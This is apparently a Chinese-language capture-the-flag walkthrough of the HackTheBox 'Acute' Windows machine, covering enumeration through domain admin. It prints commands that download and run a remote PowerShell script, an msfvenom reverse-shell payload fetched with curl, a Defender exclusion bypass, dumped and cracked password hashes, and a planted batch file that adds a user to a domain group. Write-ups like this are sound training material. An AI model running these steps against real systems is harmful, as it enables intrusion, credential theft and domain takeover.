基本信息

端口扫描

只有一个443:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
$ nmap -sC -sV 10.10.11.145
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-01 14:03 CST
Nmap scan report for 10.10.11.145
Host is up (0.088s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
443/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| ssl-cert: Subject: commonName=atsserver.acute.local
| Subject Alternative Name: DNS:atsserver.acute.local, DNS:atsserver
| Not valid before: 2022-01-06T06:34:58
|_Not valid after: 2030-01-04T06:34:58
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
| tls-alpn:
|_ http/1.1
|_ssl-date: 2022-03-01T06:05:41+00:00; 0s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 122.22 seconds

443

直接访问是404,加hosts后访问,是一个wordpress:

1
10.10.11.145 atsserver.acute.local

atsserver.acute.local

about us里可以得到一些用户名,右上角可以下载到一个文件,里面提到默认密码:

另外也提到了PSWA(PowerShell WebAccess):

也给出了PSWA链接:

PSWA

PSWA登录需要用户名密码和主机名,用户名列表和默认密码已经有了,文档的exif信息中可以得到主机名:

users.txt

根据网页上得到的用户名和文档中得到的用户名格式整理成字典

1
2
3
4
5
6
edavies
chall
awallace
imonks
jmorgon
lhopkins

edavies

1
2
3
edavies
Password1!
Acute-Pc01

edavies用户没有修改默认密码,可以登录进PSWA:

内网横向

看起来现在是在一个容器或者虚拟机中:

端口扫描

使用powershell进行内网网关进行端口扫描:

扫描比较费时间:

1
2
IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.8:7777/port-scan-tcp.ps1')
1..1024 | foreach { port-scan-tcp 172.16.22.1 $_ } > ports_open_gateway

bypass defender

当前主机运行着defender,但配置有白名单路径,可以在白名单目录中上传执行exe:

1
2
3
4
5
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths"

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.8 LPORT=4444 -f exe -o msf.exe

curl http://10.10.14.8:7777/msf.exe -o msf.exe

screenshare

已有的session监控桌面,会发现定时运行powershell,其中得到主机名用户名密码:

1
2
3
4
5
meterpreter > screenshare -q 100

$pass = ConvertTo-SecureString "W3_4R3_th3_f0rce." -AsPlaintext -Force
$cred = New-Object System.Management.Automation.PSCredential ("acute\imonks", $pass)
Enter-PSSession -computername ATSSERVER -ConfigurationName dc_manage -credential $cred

ATSSERVER

直接在PSWA中使用得到的命令,不能在PowerShell PSSession中运行Enter-PSSession,但可以通过Invoke-Command在目标主机上运行命令:

1
Invoke-Command -computername ATSSERVER -ConfigurationName dc_manage -credential $cred -command {whoami}

user flag

现在得到的就是外部宿主机用户权限,读取usre.txt:

jmorgan && ACUTE-PC01 system

wm.ps1中得到jmorgan用户相关信息,他会对Acute-PC01即容器进行一些操作:

我们可以尝试修改其中内容,以jmorgan用户身份运行我们容器内的msf.exe:

1
2
3
Invoke-Command -computername ATSSERVER -ConfigurationName dc_manage -credential $cred -ScriptBlock{((cat "c:\users\imonks\Desktop\wm.ps1" -Raw) -replace 'Get-Volume','cmd.exe /c c:\utils\msf.exe') | set-content -path c:\users\imonks\Desktop\wm.ps1} 
Invoke-Command -computername ATSSERVER -ConfigurationName dc_manage -credential $cred -ScriptBlock{cat c:\users\imonks\Desktop\wm.ps1}
Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock{C:\Users\imonks\Desktop\wm.ps1}

jmorgan在管理员组中,可以直接得到ACUTE-PC01的system权限:

hashdump && crack

dump hash,可以破解出来一个密码:

1
2
3
4
5
6
7
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a29f7623fd11550def0192de9246f46b:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Natasha:1001:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:24571eab88ac0e2dcef127b8e9ad4740:::

a29f7623fd11550def0192de9246f46b Password@123

AWallace

前面在宿主机进行信息搜集可以知道awallace在manager组中,尝试发现可以复用这个密码

1
2
3
$password = ConvertTo-SecureString "Password@123" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("Acute\AWallace",$password)
Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -Command {whoami}

keepmeon

查看目录可以发现一个keepmeon,大概是lois用户每5分钟运行,而最初的文档中也提到lois有权限更改组成员:

1
2
Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -Command {ls 'c:\program files\keepmeon'}
Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -Command {cat 'c:\program files\keepmeon\keepmeon.bat'}

site admin

所以我们可以把已有的AWallace加入到site admin组中, 新增一个bat,等待5分钟自动执行:

1
2
3
4
5
Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock {Set-Content -Path 'c:\program files\Keepmeon\admin.bat' -Value 'net group site_admin awallace /add /domain'}
Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock {ls 'c:\program files\Keepmeon\'}
Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock {cat 'c:\program files\Keepmeon\admin.bat'}

Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -Command {whoami /groups}

执行后我们不仅有site admin,也自动成为了域管:

root flag

1
2
Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock {ls 'c:\users\administrator\desktop'}
Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock {cat 'c:\users\administrator\desktop\root.txt'}

参考资料